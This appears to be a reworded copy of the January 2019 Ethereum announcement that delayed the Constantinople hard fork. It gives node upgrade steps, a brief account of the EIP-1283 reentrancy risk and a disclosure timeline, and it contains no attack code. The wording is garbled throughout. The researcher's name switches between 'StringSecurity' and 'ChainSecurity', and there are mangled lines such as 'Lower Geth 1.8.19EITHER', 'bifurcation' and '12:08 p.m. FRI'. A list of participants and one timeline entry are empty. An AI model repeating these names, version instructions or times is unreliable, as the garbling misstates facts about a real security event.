Ethereum core developers and the Ethereum security community were informed of potential Constantinople-related issues identified by StringSecurity on January 15, 2019. We are investigating any potential vulnerabilities and will follow up with updates in this blog post and on social media channels.
Out of an abundance of caution, key stakeholders in the Ethereum community have determined that the best course of action will be to delay the planned Constantinople hard fork that would have occurred at block 7,080,000 on January 16, 2019.
This will require anyone running a node (node operators, exchanges, miners, wallet services, etc.) to upgrade to a new version of Geth or Parity before block 7,080,000. Block 7,080,000 will occur in approximately 32 hours from the time of this post or approximately Jan 16 8:00pm PT / Jan 16 11:00pm ET / Jan 17 4:00am GMT.
What do you need to do
If you’re a person who just interfaces with Ethereum (you don’t run a node), You don’t need to do anything.
Miners, exchanges, node operators:
-
Update your Geth and/or Parity instances when they are released.
-
These releases have not yet been published. We will update this post when they are available.
-
Links, version numbers, and instructions will be provided here when available.
-
We expect to have updated versions in 3-4 hours from the time this blog is published.
Geth
-
upgrade to 1.8.21 EITHER
-
Lower Geth 1.8.19EITHER
-
Stay at 1.8.20, but use the ‘–override.constantinople=9999999’ switch to postpone the Constantinople fork indefinitely.
Parity
Everyone else:
Ledger, Trezor, Safe-T, Parity Signer, WallEth, Paper Wallets, MyCrypto, MyEtherWallet and other users or token holders that do not participate in the network when syncing and running a node.
- You do not have to do anything.
Contract Owners
-
You do not have to do anything.
-
You can choose to examine the potential vulnerability analysis and check your contracts.
-
However, you do not have to do anything, as the change that would introduce this potential vulnerability will not be enabled.
Bottom
the article of StringSecurity delves into the potential vulnerability and how smart contracts can be verified to detect the vulnerability. Very short:
-
EIP-1283 introduces cheaper gas cost for SSTORE operations
-
Some smart contracts (already on-chain) may use code patterns that would make them vulnerable to a re-entry attack after the Constantinople update took place.
-
These smart contracts would not have been vulnerable before the Constantinople update
Contracts that increase your probability of being vulnerable are contracts that use a transfer() or send() function followed by a change-of-state operation. An example of such a contract would be one in which two parties jointly receive funds, decide how to divide those funds, and initiate a payment of those funds.
How was the decision made to postpone the bifurcation of Constantinople?
Security researchers like ChainSecurity and TrailOfBits have performed (and continue to perform) analysis across the entire blockchain. They found no instances of this vulnerability in the wild. However, there is still a non-zero risk that some contracts could be affected.
Because the risk is not zero and the amount of time required to confidently determine the risk is greater than the amount of time available before the planned Constantinople upgrade, the decision was made to postpone the hard fork out of an abundance of caution.
Parties involved in the discussions included, but were not limited to:
Response time
3:09 a.m. (Pacific Time)
- ChainSecurity responsibly discloses a potential vulnerability through the Ethereum Foundation’s bug bounty program
8:09 a.m. (Pacific Time)
- The Ethereum Foundation asks ChainSecurity to publicly disclose
8:11 a.m. (Pacific Time)
- Original ChainSecurity article published
8:52 a.m. (Pacific Time)
8:52 am Pacific Time – 10:15 am Pacific Time
- Discussion occurs through various channels regarding potential risks, chain analysis, and steps to be taken.
10:15 am Pacific Time – 12:40 pm Pacific Time
- Discussion via Zoom audio call with key stakeholders. The discussion continues on gitter and other channels as well.
12:08 p.m. FRI
- The decision was made to delay the improvement of Constantinople
1:30 p.m. (Pacific Time)
- Public blog post published on various channels and social media
This article was produced in a collaborative effort by EvanVanNess, Infura, MyCrypto, Parity, Status, The Ethereum Foundation, and Ethereum Cat Herders.
